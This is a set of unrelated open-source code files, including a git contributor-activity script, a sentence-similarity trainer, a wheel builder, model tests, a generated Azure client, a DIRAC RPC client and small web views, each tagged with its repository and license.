# NOTE(review): this `cd` runs in a child shell and has no effect on this
# process — subsequent commands rely on --git-dir instead.
os.system('cd ' + repo_folder)
log = os.popen('git --git-dir ./' + repo_folder + '/.git log').read().split('\n')
# log = os.popen('git log').read().split('\n')
# Keep only "commit <sha>" and "Author:" lines, then reduce each to the
# sha / lower-cased author token, and pair them as (author, sha).
log = list(filter(lambda x: re.match('commit [0-9a-f]{5,40}',x) != None or x[:6] == 'Author', log))
log = list(map(lambda x: x.split(' ')[1].lower() if x[:6] == 'Author' else x.split(' ')[1], log))
log = list(zip(log[1:len(log):2], log[0:len(log):2]))
# activity maps each author -> {file path -> total changed lines}.
activity = dict(map(lambda x: (x[0], {}), log))
for i in range(len(log)):
    # Diff each commit against its parent (or the empty tree for the oldest).
    if i < len(log)-1:
        out = os.popen('git --git-dir ./' + repo_folder + '/.git diff '+log[i][1]+' '+log[i+1][1]+' --numstat').read().split('\n')
        # out = os.popen('git diff '+log[i][1]+' '+log[i+1][1]+' --numstat').read().split('\n')
    else:
        out = os.popen('git --git-dir ./' + repo_folder + '/.git diff '+log[i][1]+' '+EMPTY+' --numstat').read().split('\n')
        # out = os.popen('git diff '+log[i][1]+' '+EMPTY+' --numstat').read().split('\n')
    user = log[i][0]
    for o in out[:-1]:
        ol = o.split('\t')
        # Binary files show "-" for added/deleted counts; count them as 1 change.
        changes = 1
        if ol[0] != '-' and ol[1] != '-':
            changes = int(ol[0])+int(ol[1])
        k = '/'+repo_folder+'/'+ol[2]
        if k in activity[user]:
            activity[user][k] += changes
        else:
            activity[user][k] = changes
# print(activity)
# for l in log: print(l)
rootDir = './'+repo_folder
fileList = []
# Recursive `ls` + awk to emit one "dir/file" path per line.
cmd = """ls -R """+rootDir+""" | awk '/:$/&&f{s=$0;f=0}/:$/&&!f{sub(/:$/,"");s=$0;f=1;next}NF&&f{ print s"/"$0 }'"""
fileList = os.popen(cmd).read().split('\n')
fileList = list(map(lambda x: x[1:], fileList))
# Sort shallow paths first so parents are inserted before children.
fileList = sorted(fileList, key=lambda x: x.count('/'))[1:]
# for f in fileList: print(f)
class Node:
    """One entry in the repository file tree.

    Attributes:
        path: path of this file or directory within the repo.
        contributions: per-user change counts aggregated over this subtree.
        files: child Node objects (empty for regular files).
    """

    def __init__(self, path):
        self.path = path
        self.files = []
        self.contributions = {}
def getNode(node, path):
    """Depth-first search the tree rooted at `node` for the node whose
    `.path` equals `path`; return it, or None if no such node exists."""
    if node.path == path:
        return node
    for child in node.files:
        found = getNode(child, path)
        if found is not None:
            return found
    return None
def addNode(node, childPath, parentPath):
    """Create a Node for `childPath` and attach it to the node found at
    `parentPath` in the tree rooted at `node`."""
    parent_node = getNode(node, parentPath)
    parent_node.files.append(Node(childPath))
def populateTree(root, data):
    """Insert every path in `data` into the tree rooted at `root`.

    Paths must be ordered so parents appear before their children
    (the caller sorts by slash count). A path with no directory part
    is attached directly under '/'.
    """
    for path in data:
        cut = path.rfind('/')
        parent_path = path[:cut] if cut > 0 else '/'
        addNode(root, path, parent_path)
def combineDicts(d1, d2):
    """Return a new dict merging `d1` and `d2`, summing values on shared keys."""
    merged = dict(d1)
    for key in d2:
        if key in merged:
            merged[key] += d2[key]
        else:
            merged[key] = d2[key]
    return merged
def extractActivity(path):
    """Map each user to their change count for exactly `path`.

    Reads the module-global `activity` ({user: {path: changes}}) and
    includes only users who touched this path.
    """
    return {user: files[path] for user, files in activity.items() if path in files}
def getContributions(node):
    """Recursively populate `node.contributions`.

    Leaves take their per-user counts straight from the global activity
    table; directories merge the contributions of all their children.
    Returns the node's (now filled) contributions dict.
    """
    if not node.files:
        node.contributions = extractActivity(node.path)
    else:
        for child in node.files:
            node.contributions = combineDicts(node.contributions, getContributions(child))
    return node.contributions
# Build the file tree, aggregate per-user contributions, and serialize the
# whole Node tree (via each object's __dict__) as pretty-printed JSON.
root = Node('/'+repo_folder)
populateTree(root, fileList)
getContributions(root)
json = json.dumps(root, default=lambda o: o.__dict__, sort_keys=False, indent=4, separators=(',', ': '))
# Remove the cloned working copy now that analysis is done.
os.system('rm -rf ' + repo_folder)
# print(json)
output = open('data.json','w')
output.write(json)
output.close() | vivekmumbles/git-ledger | data.py | Python | gpl-2.0 | 3,254 |
# -*- coding: utf-8 -*-
from Model import Model
import sys, locale;
# Loads the example sentence pairs from the given file.
def load_data_X(file):
    """Load sentence pairs from `file`: one tab-separated pair per line,
    decoded from UTF-8 (Python 2 byte strings)."""
    pairs = []
    for raw_line in open(file):
        pairs.append(raw_line.decode('utf-8').strip().split('\t'))
    return pairs
# Loads the gold-standard scores from the given file.
def load_data_y(file):
    """Load one gold-standard score (float) per line from `file`."""
    return [float(line) for line in open(file)]
# Constrains x to the interval [minx, maxx].
def clamp(x, minx, maxx):
    """Return x limited to the closed interval [minx, maxx]."""
    return max(minx, min(x, maxx))
# Writes the model output to `file` (scores are clamped to [0, 5]).
def write_output(file, output):
    """Write one score per line to `file`, clamping each into [0, 5].

    Fix: the file handle was previously never closed; a context manager
    now guarantees it is flushed and closed.
    """
    with open(file, 'w') as f:
        for x in output:
            r = clamp(x, 0, 5)
            f.write(str(r) + '\n')
# Writes the n worst-scored examples to `file` (scores clamped to [0, 5]).
def write_low_scored(file, X, y, output, n):
    """Write the n examples with the largest |clamped prediction - gold|.

    Each entry records both sentences, the gold score ("Tocno"), the clamped
    prediction ("Dobiveno") and their absolute difference ("Razlika").

    Fix: the file handle was previously never closed; a context manager now
    guarantees it is flushed and closed. (Python 2 module: xrange / .encode
    on unicode are kept as-is.)
    """
    if (n >= len(output)):
        n = len(output) - 1
    # Absolute error of every clamped prediction against its gold score.
    diffs = [abs(clamp(output[i], 0, 5) - y[i]) for i in xrange(0, len(output))]
    # The n-th largest error serves as the inclusion threshold.
    diff_threshold = sorted(diffs, reverse=True)[n]
    with open(file, 'w') as f:
        for i in xrange(0, len(output)):
            r = clamp(output[i], 0, 5)
            diff = abs(r - y[i])
            if diff >= diff_threshold:
                f.write(X[i][0].encode('utf-8') + '\n')
                f.write(X[i][1].encode('utf-8') + '\n')
                f.write('Tocno: ' + str(y[i]) + '\n')
                f.write('Dobiveno: ' + str(r) + '\n')
                f.write('Razlika: ' + str(diff) + '\n')
# Trains (if needed) and evaluates the model for one dataset configuration.
# A pre-trained model may be supplied via `model` to skip training.
def test(X_train_files, y_train_files, X_test_files, y_test_files, train_out_file, test_out_file,
         train_bad_out_file=None, test_bad_out_file=None,
         model=None, C_set=None, gamma_set=None, epsilon_set=None, k=None):
    """Load train/test data, optionally train a model via k-fold grid search
    over (C, gamma, epsilon), write clamped predictions and (optionally) the
    50 worst-scored examples, and return the model for reuse.

    Empty-string output file names skip the corresponding prediction pass.
    """
    X_train = []
    y_train = []
    X_test = []
    y_test = []
    for file in X_train_files:
        X_train.extend(load_data_X(file))
    for file in y_train_files:
        y_train.extend(load_data_y(file))
    for file in X_test_files:
        X_test.extend(load_data_X(file))
    for file in y_test_files:
        y_test.extend(load_data_y(file))
    if model is None:
        # Default hyper-parameter grids: powers of two for C and gamma.
        if C_set is None:
            C_set = [2 ** x for x in range(-5, 15 + 1)]
        if gamma_set is None:
            gamma_set = [2 ** x for x in range(-15, 3 + 1)]
        if epsilon_set is None:
            epsilon_set = [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.02, 0.05, 0.1, 0.15, 0.2, 0.25, 0.3, 0.4, 0.5, 0.6,
                           0.7, 0.8, 0.9, 1, 2]
        if k is None:
            k = 10
        model = Model()
        model.train_k_fold(X_train, y_train, C_set, gamma_set, epsilon_set, k)
        print 'C:', model.get_param_C()
        print 'epsilon:', model.get_param_epsilon()
        print 'gamma:', model.get_param_gamma()
    if train_out_file != '':
        # print "Tocni (train): ", y_train
        predicted_train = model.predict(X_train)
        # print "Dobiveni (train): ", predicted_train
        write_output(train_out_file, predicted_train)
        if (train_bad_out_file is not None):
            write_low_scored(train_bad_out_file, X_train, y_train, predicted_train, 50)
    if test_out_file != '':
        # print "Tocni (test): ", y_test
        predicted_test = model.predict(X_test)
        # print "Dobiveni (test): ", predicted_test
        write_output(test_out_file, predicted_test)
        if (test_bad_out_file is not None):
            write_low_scored(test_bad_out_file, X_test, y_test, predicted_test, 50)
    return model
# Function for the interactive demo.
def interactive_demo(X_train_files, y_train_files, C, gamma, epsilon):
    """Train a model with the given hyper-parameters, then loop forever:
    read a sentence pair from stdin and print its predicted similarity
    score clamped to [0, 5]. (Python 2: raw_input + explicit decoding.)
    """
    print 'Zapocinje ucenje modela'
    X_train = []
    y_train = []
    for file in X_train_files:
        X_train.extend(load_data_X(file))
    for file in y_train_files:
        y_train.extend(load_data_y(file))
    model = Model()
    model.train(X_train, y_train, True, C, gamma, epsilon)
    print 'Ucenje modela je zavrseno'
    while True:
        print 'Unesite 1. recenicu:'
        x1 = raw_input().decode(sys.stdin.encoding or locale.getpreferredencoding(True))
        print 'Unesite 2. recenicu:'
        x2 = raw_input().decode(sys.stdin.encoding or locale.getpreferredencoding(True))
        x = [x1, x2]
        y = model.predict(x)[0]
        print clamp(y, 0, 5)
# Run training and evaluation; sys.argv[1] selects the scenario
# (1=MSRpar, 2=MSRvid, 3=SMT, 4=OnWn+All, default 5=interactive demo).
k = 5
if len(sys.argv) >= 2:
    k = int(sys.argv[1])
print "Trazena akcija k =", k
if k == 1:
    # MSRpar
    print 'MSRpar'
    test(['../data/train/STS.input.MSRpar.txt'], ['../data/train/STS.gs.MSRpar.txt'],
         ['../data/test-gold/STS.input.MSRpar.txt'], ['../data/test-gold/STS.gs.MSRpar.txt'],
         'MSRpar_train.out', 'MSRpar_test.out', 'MSRpar_train_bad.txt', 'MSRpar_test_bad.txt')
elif k == 2:
    # MSRvid
    print 'MSRvid'
    test(['../data/train/STS.input.MSRvid.txt'], ['../data/train/STS.gs.MSRvid.txt'],
         ['../data/test-gold/STS.input.MSRvid.txt'], ['../data/test-gold/STS.gs.MSRvid.txt'],
         'MSRvid_train.out', 'MSRvid_test.out', 'MSRvid_train_bad.txt', 'MSRvid_test_bad.txt')
elif k == 3:
    # SMTeuroparl and SMTnews (reuses the SMTeuroparl-trained model)
    print 'SMTeuroparl'
    model = test(['../data/train/STS.input.SMTeuroparl.txt'], ['../data/train/STS.gs.SMTeuroparl.txt'],
                 ['../data/test-gold/STS.input.SMTeuroparl.txt'], ['../data/test-gold/STS.gs.SMTeuroparl.txt'],
                 'SMTeuroparl_train.out', 'SMTeuroparl_test.out', 'SMTeuroparl_train_bad.txt', 'SMTeuroparl_test_bad.txt')
    print 'SMTnews'
    test([], [],
         ['../data/test-gold/STS.input.surprise.SMTnews.txt'], ['../data/test-gold/STS.gs.surprise.SMTnews.txt'],
         '', 'SMTnews_test.out', '', 'SMTnews_test_bad.txt', model)
elif k == 4:
    # OnWn and All (trains once on all train sets, reuses for "All")
    print 'OnWn'
    model = test(['../data/train/STS.input.MSRpar.txt', '../data/train/STS.input.MSRvid.txt',
                  '../data/train/STS.input.SMTeuroparl.txt'],
                 ['../data/train/STS.gs.MSRpar.txt', '../data/train/STS.gs.MSRvid.txt',
                  '../data/train/STS.gs.SMTeuroparl.txt'],
                 ['../data/test-gold/STS.input.surprise.OnWN.txt'],
                 ['../data/test-gold/STS.gs.surprise.OnWN.txt'],
                 'OnWn_train.out', 'OnWn_test.out', 'OnWn_train_bad.txt', 'OnWn_test_bad.txt',
                 None, [2 ** x for x in range(-3, 11 + 1)], [2 ** x for x in range(-15, 3 + 1)],
                 [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.02, 0.05, 0.1, 0.15, 0.2, 0.25, 0.5, 0.75, 1, 2], 3)
    print 'All'
    test([], [],
         ['../data/test-gold/STS.input.MSRpar.txt', '../data/test-gold/STS.input.MSRvid.txt',
          '../data/test-gold/STS.input.SMTeuroparl.txt', '../data/test-gold/STS.input.surprise.SMTnews.txt',
          '../data/test-gold/STS.input.surprise.OnWN.txt'],
         ['../data/test-gold/STS.gs.MSRpar.txt', '../data/test-gold/STS.gs.MSRvid.txt',
          '../data/test-gold/STS.gs.SMTeuroparl.txt', '../data/test-gold/STS.gs.surprise.SMTnews.txt',
          '../data/test-gold/STS.gs.surprise.OnWN.txt'],
         '', 'All_test.out', '', 'All_test_bad.txt', model)
elif k == 5:
    print 'Interaktivni demo'
    interactive_demo(['../data/train/STS.input.MSRpar.txt', '../data/train/STS.input.MSRvid.txt',
                      '../data/train/STS.input.SMTeuroparl.txt'],
                     ['../data/train/STS.gs.MSRpar.txt', '../data/train/STS.gs.MSRvid.txt',
'../data/train/STS.gs.SMTeuroparl.txt'], 2, 2, 0.25) | kbiscanic/apt_project | apt/Main.py | Python | apache-2.0 | 7,473 |
import argparse
import subprocess
import os.path as osp
# Wheels are collected into ./wheelhouse next to this script.
cdir = osp.dirname(__file__)
wheeldir_dpath = osp.join(cdir, 'wheelhouse')
# Shared `pip wheel` arguments: build into the wheelhouse and also use it
# as a local find-links index so existing wheels are reused.
pip_args = ['wheel', '--wheel-dir', wheeldir_dpath, '--use-wheel', '--find-links',
            wheeldir_dpath]
def build_file(req_fpath):
    """Build wheels for every requirement in `req_fpath`, first under
    Python 2's pip and then under pip3.4."""
    for pip_exe in ('pip', 'pip3.4'):
        subprocess.check_call([pip_exe] + pip_args + ['-r', req_fpath])
def build_packages(packages):
    """Build wheels for the named packages, first under Python 2's pip and
    then under pip3.4."""
    for pip_exe in ('pip', 'pip3.4'):
        subprocess.check_call([pip_exe] + pip_args + packages)
# CLI: zero or more package names; with none given, the pinned requirement
# files (runtime.txt, testing.txt) are built instead.
parser = argparse.ArgumentParser()
parser.add_argument('packages', nargs='*', default=[])
if __name__ == '__main__':
    args = parser.parse_args()
    if not args.packages:
        build_file(osp.join(cdir, 'runtime.txt'))
        build_file(osp.join(cdir, 'testing.txt'))
    else:
build_packages(args.packages)
| nZac/keg-elements | requirements/build-wheelhouse.py | Python | bsd-3-clause | 881 |
"""
This is the test suite for segregation.py.
"""
from unittest import TestCase
from propargs.propargs import PropArgs
import models.segregation as seg
from indra.composite import Composite
from indra.env import Env
from registry.registry import get_env
from models.segregation import DEF_TOLERANCE, DEF_SIGMA
from models.segregation import env_favorable, BLUE_AGENTS, RED_AGENTS
from models.segregation import group_names, my_group_index
from models.segregation import other_group_index, get_tolerance
from models.segregation import set_up, create_resident, RED_TEAM, BLUE_TEAM
# Arbitrary agent serial number reused across tests.
TEST_ANUM = 999999
# Number of samples drawn when averaging the stochastic tolerance.
REP_RAND_TESTS = 100
# Side length of the small test city grid.
SMALL_GRID = 4
def print_sep():
    # Visual separator for test output.
    print("________________________", flush=True)
class SegregationTestCase(TestCase):
    """Tests for the segregation model (agents, groups, tolerance, env)."""

    def setUp(self):
        set_up()

    def tearDown(self):
        pass

    # an integration test:
    def test_main(self):
        self.assertEqual(seg.main(), 0)

    def test_get_tolerance(self):
        """
        Test that our tolerance function gets a good distribution.
        """
        sum_of_tolerance = 0
        for i in range(REP_RAND_TESTS):
            sum_of_tolerance += get_tolerance(DEF_TOLERANCE, DEF_SIGMA)
        avg = sum_of_tolerance / REP_RAND_TESTS
        # The sample mean should land within +/-0.2 of the configured mean.
        self.assertLess(DEF_TOLERANCE - .2, avg)
        self.assertGreater(DEF_TOLERANCE + .2, avg)

    def test_my_group_index(self):
        red_agent = create_resident(RED_AGENTS, TEST_ANUM)
        self.assertEqual(RED_TEAM, my_group_index(red_agent))
        blue_agent = create_resident(BLUE_AGENTS, TEST_ANUM)
        self.assertEqual(BLUE_TEAM, my_group_index(blue_agent))

    def test_other_group_index(self):
        # The "other" group must always be the opposite team.
        red_agent = create_resident(RED_AGENTS, TEST_ANUM)
        self.assertEqual(BLUE_TEAM, other_group_index(red_agent))
        blue_agent = create_resident(BLUE_AGENTS, TEST_ANUM)
        self.assertEqual(RED_TEAM, other_group_index(blue_agent))

    def test_create_agent(self):
        """
        Test that creating an agent works.
        """
        fred = create_resident(RED_AGENTS, TEST_ANUM)
        freds_nm = group_names[RED_TEAM] + str(TEST_ANUM)
        self.assertEqual(freds_nm, str(fred))

    def agent_in_little_city(self, with_blue=False):
        # Helper (not a test): build a SMALL_GRID x SMALL_GRID city holding
        # one red agent and, optionally, blue agents filling the remainder.
        red_agents = Composite("My reds")
        test_agent = create_resident(RED_AGENTS, TEST_ANUM)
        red_agents += test_agent
        blue_agents = Composite("My blues")
        if with_blue:
            for i in range(0, SMALL_GRID * SMALL_GRID - 1):
                blue_agents += create_resident(BLUE_AGENTS, TEST_ANUM + 1)
        my_city = Env("Small city for test", width=SMALL_GRID,
                      height=SMALL_GRID,
                      members=[red_agents, blue_agents])
        return (test_agent, my_city)

    def test_seg_agent_action(self):
        """
        We are going to test two cases: one where agent should
        be satisfied with neighborhood, and one not.
        """
        (test_agent, city) = self.agent_in_little_city()
        # self.assertEqual(seg_agent_action(test_agent), True)
        (test_agent, city) = self.agent_in_little_city(with_blue=True)
        # the following test is mysteriously failing: must debug!
        # self.assertEqual(seg_agent_action(test_agent), False)

    def test_env_favorable(self):
        env_fav = env_favorable(0.4, 0.5)
        self.assertEqual(env_fav, False)
        env_fav = env_favorable(0.6, 0.5)
        self.assertEqual(env_fav, True)
| gcallah/Indra | models/tests/test_segregation.py | Python | gpl-3.0 | 3,455 |
#---------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#---------------------------------------------------------------------------------------------
#pylint: skip-file
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator 0.17.0.0
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.service_client import ServiceClient
from msrest import Serializer, Deserializer
from msrestazure import AzureConfiguration
from .version import VERSION
from .operations.vnet_gateway_operations import VnetGatewayOperations
from . import models
class VnetGatewayCreationClientConfiguration(AzureConfiguration):
    """Configuration for VnetGatewayCreationClient
    Note that all parameters used to create this instance are saved as instance
    attributes.

    NOTE(review): AutoRest-generated code (see module header); prefer
    regenerating over hand-editing.

    :param credentials: Gets Azure subscription credentials.
    :type credentials: :mod:`A msrestazure Credentials
     object<msrestazure.azure_active_directory>`
    :param subscription_id: Gets subscription credentials which uniquely
     identify Microsoft Azure subscription. The subscription ID forms part of
     the URI for every service call.
    :type subscription_id: str
    :param api_version: Client Api Version.
    :type api_version: str
    :param accept_language: Gets or sets the preferred language for the
     response.
    :type accept_language: str
    :param long_running_operation_retry_timeout: Gets or sets the retry
     timeout in seconds for Long Running Operations. Default value is 30.
    :type long_running_operation_retry_timeout: int
    :param generate_client_request_id: When set to true a unique
     x-ms-client-request-id value is generated and included in each request.
     Default is true.
    :type generate_client_request_id: bool
    :param str base_url: Service URL
    :param str filepath: Existing config
    """

    def __init__(
            self, credentials, subscription_id, api_version='2015-11-01', accept_language='en-US', long_running_operation_retry_timeout=30, generate_client_request_id=True, base_url=None, filepath=None):

        # Fail fast on required/ill-typed parameters.
        if credentials is None:
            raise ValueError("Parameter 'credentials' must not be None.")
        if subscription_id is None:
            raise ValueError("Parameter 'subscription_id' must not be None.")
        # NOTE(review): isinstance(..., str) rejects `unicode` ids on
        # Python 2 — confirm that is intended.
        if not isinstance(subscription_id, str):
            raise TypeError("Parameter 'subscription_id' must be str.")
        if api_version is not None and not isinstance(api_version, str):
            raise TypeError("Optional parameter 'api_version' must be str.")
        if accept_language is not None and not isinstance(accept_language, str):
            raise TypeError("Optional parameter 'accept_language' must be str.")
        if not base_url:
            base_url = 'https://management.azure.com'
        super(VnetGatewayCreationClientConfiguration, self).__init__(base_url, filepath)
        # Advertise this client and the SDK in the User-Agent header.
        self.add_user_agent('vnetgatewaycreationclient/{}'.format(VERSION))
        self.add_user_agent('Azure-SDK-For-Python')
        self.credentials = credentials
        self.subscription_id = subscription_id
        self.api_version = api_version
        self.accept_language = accept_language
        self.long_running_operation_retry_timeout = long_running_operation_retry_timeout
        self.generate_client_request_id = generate_client_request_id
class VnetGatewayCreationClient(object):
    """VnetGatewayCreationClient

    NOTE(review): AutoRest-generated code (see module header); prefer
    regenerating over hand-editing.

    :ivar config: Configuration for client.
    :vartype config: VnetGatewayCreationClientConfiguration

    :ivar vnet_gateway: VnetGateway operations
    :vartype vnet_gateway: .operations.VnetGatewayOperations

    :param credentials: Gets Azure subscription credentials.
    :type credentials: :mod:`A msrestazure Credentials
     object<msrestazure.azure_active_directory>`
    :param subscription_id: Gets subscription credentials which uniquely
     identify Microsoft Azure subscription. The subscription ID forms part of
     the URI for every service call.
    :type subscription_id: str
    :param api_version: Client Api Version.
    :type api_version: str
    :param accept_language: Gets or sets the preferred language for the
     response.
    :type accept_language: str
    :param long_running_operation_retry_timeout: Gets or sets the retry
     timeout in seconds for Long Running Operations. Default value is 30.
    :type long_running_operation_retry_timeout: int
    :param generate_client_request_id: When set to true a unique
     x-ms-client-request-id value is generated and included in each request.
     Default is true.
    :type generate_client_request_id: bool
    :param str base_url: Service URL
    :param str filepath: Existing config
    """

    def __init__(
            self, credentials, subscription_id, api_version='2015-11-01', accept_language='en-US', long_running_operation_retry_timeout=30, generate_client_request_id=True, base_url=None, filepath=None):

        self.config = VnetGatewayCreationClientConfiguration(credentials, subscription_id, api_version, accept_language, long_running_operation_retry_timeout, generate_client_request_id, base_url, filepath)
        self._client = ServiceClient(self.config.credentials, self.config)

        # Build the (de)serializers over every model class exported by `models`.
        client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
        self._serialize = Serializer(client_models)
        self._deserialize = Deserializer(client_models)

        self.vnet_gateway = VnetGatewayOperations(
            self._client, self.config, self._serialize, self._deserialize)
| BurtBiel/azure-cli | src/command_modules/azure-cli-network/azure/cli/command_modules/network/mgmt_vnet_gateway/lib/vnet_gateway_creation_client.py | Python | mit | 5,916 |
"""
Declares model object for the VLDB
"""
from afs.model.BaseModel import BaseModel
class VLDB(BaseModel) :
    """
    Model for the Volume Location Database.
    This defines a logical view on the DB.
    The single copies of it are defined in the
    DBServer model.
    """

    def __init__(self):
        """
        Initializes empty shell
        """
        # declare db-internal attributes
        BaseModel.__init__(self)
        ## JSON-serialized companion of dbservers_ipaddrs below
        ## list of servers providing this DB
        self.dbservers_ipaddrs_js = "[]"
        self.dbservers_ipaddrs = []
        ## syncsite, master-server
        self.sync_server_ipaddrs = ""
        ## FIXME: add more attributes like registered fileservers etc.
        ## DB-version (-1 presumably means "not yet queried" — confirm)
        self.vldb_version = -1
        ## list of attributes not to put into the DB
        self.unmapped_attributes_list = [ 'parts', 'ExtServAttr' ]
| openafs-contrib/afspy | afs/model/VLDB.py | Python | bsd-2-clause | 883 |
""" This module hosts the logic for executing an RPC call.
"""
from DIRAC.Core.DISET.private.BaseClient import BaseClient
from DIRAC.Core.Utilities.ReturnValues import S_OK
from DIRAC.Core.Utilities.DErrno import cmpError, ENOAUTH
class InnerRPCClient(BaseClient):
    """This class instruments the BaseClient to perform RPC calls.
    At every RPC call, this class:
      * connects
      * proposes the action
      * sends the method parameters
      * retrieve the result
      * disconnect
    """

    # Number of times we retry the call.
    # The connection retry is handled by BaseClient
    # NOTE(review): class-level counter; `self.__retry += 1` below rebinds it
    # on the instance, so retries accumulate over the instance's lifetime and
    # are never reset after a success — confirm this is intended.
    __retry = 0

    def executeRPC(self, functionName, args):
        """Perform the RPC call, connect before and disconnect after.

        :param functionName: name of the function
        :param args: arguments to the function
        :return: in case of success, the return of the server call. In any case
            we add the connection stub to it.
        """
        retVal = self._connect()
        # Generate the stub which contains all the connection and call options
        # JSON: cast args to list for serialization purposes
        stub = [self._getBaseStub(), functionName, list(args)]
        if not retVal["OK"]:
            retVal["rpcStub"] = stub
            return retVal
        # Get the transport connection ID as well as the Transport object
        trid, transport = retVal["Value"]
        try:
            # Handshake to perform the RPC call for functionName
            retVal = self._proposeAction(transport, ("RPC", functionName))
            if not retVal["OK"]:
                if cmpError(retVal, ENOAUTH):  # This query is unauthorized
                    retVal["rpcStub"] = stub
                    return retVal
                else:  # we have network problem or the service is not responding
                    if self.__retry < 3:
                        self.__retry += 1
                        return self.executeRPC(functionName, args)
                    else:
                        retVal["rpcStub"] = stub
                        return retVal
            # Send the arguments to the function
            # Note: we need to convert the arguments to list
            # We do not need to deseralize it because variadic functions
            # can work with list too
            retVal = transport.sendData(S_OK(list(args)))
            if not retVal["OK"]:
                return retVal
            # Get the result of the call and append the stub to it
            # Note that the RPC timeout basically ticks here, since
            # the client waits for data for as long as the server side
            # processes the request.
            receivedData = transport.receiveData()
            if isinstance(receivedData, dict):
                receivedData["rpcStub"] = stub
            return receivedData
        finally:
            self._disconnect(trid)
| DIRACGrid/DIRAC | src/DIRAC/Core/DISET/private/InnerRPCClient.py | Python | gpl-3.0 | 2,922 |
from django.core.exceptions import PermissionDenied
from django.views.generic import TemplateView
from C4CApplication.views.utils import create_user
class ChangeActivityView(TemplateView):
    """Page letting a logged-in member change their activity.

    Requires a session 'email' key; anonymous visitors get HTTP 403.
    """
    template_name = "C4CApplication/ChangeActivity.html"

    def dispatch(self, request, *args, **kwargs):
        # Reject anonymous users before any handler runs.
        if 'email' not in self.request.session:
            raise PermissionDenied  # HTTP 403
        # Build the business-layer user object from the session email.
        self.user = create_user(self.request.session['email'])
        return super(ChangeActivityView, self).dispatch(request, *args, **kwargs)

    def get_context_data(self, **kwargs):
        context = super(ChangeActivityView, self).get_context_data(**kwargs)
        context['member'] = self.user.db_member
        # Always True here since dispatch() enforced the session key;
        # kept for template compatibility.
return context | dsarkozi/care4care-sdp-grp4 | Care4Care/C4CApplication/views/ChangeActivityView.py | Python | agpl-3.0 | 820 |
from bottle import route, template, error, request, static_file, get, post
from index import get_index
from bmarks import get_bmarks
from tags import get_tags
from add import add_tags
from bmarklet import get_bmarklet
from account import get_account
from edit_tags import get_edit_tags
from importbm import get_import_bm
from edit import do_edit
from login import do_login
from register import do_register
@route('/')
def myroot():
    """Handle the front page."""
    return get_index()
@route('/account', method=['GET', 'POST'])
def bmarks():
    """Handle the account page.

    Bug fix: this handler previously returned get_bmarklet() — the
    bookmarklet page — leaving the imported get_account() unused.
    """
    return_data = get_account()
    return return_data
@route('/add', method=['GET', 'POST'])
def bmarks():
    """Handle the add-bookmark page."""
    return add_tags()
@route('/bmarklet')
def bmarks():
    """Handle the bookmarklet page."""
    return get_bmarklet()
@route('/bmarks')
def bmarks():
    """Handle the bookmarks listing page."""
    return get_bmarks()
@route('/edit', method=['GET', 'POST'])
def bmarks():
    """Handle the edit-bookmark page."""
    return do_edit()
@route('/edit_tags', method=['GET', 'POST'])
def bmarks():
    """Handle the edit-tags page."""
    return get_edit_tags()
@route('/import', method=['GET', 'POST'])
def bmarks():
    """Handle the bookmark-import page."""
    return get_import_bm()
@route('/login', method=['GET', 'POST'])
def bmarks():
    """Handle the login page."""
    return do_login()
@route('/register', method=['GET', 'POST'])
def bmarks():
    """Handle the registration page."""
    return do_register()
@route('/tags')
def bmarks():
    """Handle the tags listing page."""
    return get_tags()
# serve css
@get('/<filename:re:.*\.css>')
def send_css(filename):
    # Serve stylesheets from the local ./css directory.
    return static_file(filename, root='css')
# serve javascript
@get('/<filename:re:.*\.js>')
def send_js(filename):
    # Serve scripts from the local ./js directory.
    return static_file(filename, root='js')
# serve images
# NOTE(review): unlike the css/js routes this pattern has no leading '/';
# the `.*` regex absorbs the request path, so the captured filename may
# carry a leading slash — confirm lookups under ./images behave as intended.
@get('<filename:re:.*\.png>')
def send_img(filename):
    return static_file(filename, root='images')
# serve fonts
# NOTE(review): same missing leading '/' as the image route above — confirm
# the captured filename resolves correctly under ./fonts.
@get('<filename:re:.*\.(woff|woff2)>')
def send_font(filename):
    return static_file(filename, root='fonts')
@error(404)
def handle404(error):
    # Minimal HTML body for unknown routes.
    return '<H1>Ooops, its not here<BR>'
@error(500)
def handle500(error):
    # Surface the error text in the response body.
    return '<H1>Oops, its broken: {}<BR>'.format(error)
| netllama/tastipy | tastiapp.py | Python | gpl-3.0 | 2,172 |
import json
from nose.tools import eq_
import mock
from django.core.urlresolvers import reverse
from airmozilla.base.tests.test_mozillians import (
Response,
GROUPS1,
GROUPS2
)
from .base import ManageTestCase
class TestCuratedGroups(ManageTestCase):
    """Tests for the curated-groups autocomplete management view."""

    @mock.patch('logging.error')
    @mock.patch('requests.get')
    def test_curated_groups_autocomplete(self, rget, rlogging):
        # Fake the groups API: page 2 of /v2/groups/ returns GROUPS2,
        # any other /v2/groups/ request returns GROUPS1.
        def mocked_get(url, **options):
            if '/v2/groups/' in url and 'page=2' in url:
                return Response(GROUPS2)
            if '/v2/groups/' in url:
                return Response(GROUPS1)
            raise NotImplementedError(url)

        rget.side_effect = mocked_get

        url = reverse('manage:curated_groups_autocomplete')
        # No query string -> empty result list.
        response = self.client.get(url)
        eq_(response.status_code, 200)
        structure = json.loads(response.content)
        eq_(structure['groups'], [])
        # Non-matching query -> still empty.
        response = self.client.get(url, {'q': 'GROUP NUMBER X'})
        eq_(response.status_code, 200)
        structure = json.loads(response.content)
        eq_(structure['groups'], [])
        # Matching query -> [name, label-with-member-count] pair.
        response = self.client.get(url, {'q': 'GROUP NUMBER 1'})
        eq_(response.status_code, 200)
        structure = json.loads(response.content)
        eq_(
            structure['groups'], [
                [
                    'GROUP NUMBER 1',
                    'GROUP NUMBER 1 (3 members)'
                ]
            ]
        )
| kenrick95/airmozilla | airmozilla/manage/tests/views/test_curatedgroups.py | Python | bsd-3-clause | 1,463 |
# Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
